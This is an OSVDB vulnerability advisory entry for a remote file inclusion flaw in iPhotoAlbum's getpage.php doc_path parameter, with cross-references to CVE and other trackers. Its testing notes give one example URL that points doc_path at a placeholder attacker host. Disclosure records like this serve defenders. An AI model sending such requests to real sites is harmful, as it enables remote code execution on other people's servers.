iPhotoAlbum getpage.php doc_path Variable Remote File Inclusion

2005-07-09T11:28:08
ID OSVDB:17889
Type osvdb
Reporter OSVDB
Modified 2005-07-09T11:28:08

Description

Manual Testing Notes

http://[victim]/[path_to_iPhotoAlbum]/getpage.php?page=online&doc_path=http://[attacker]/

References:

Security Tracker: 1014448 Secunia Advisory ID:16031 Related OSVDB ID: 17890 CVE-2005-2246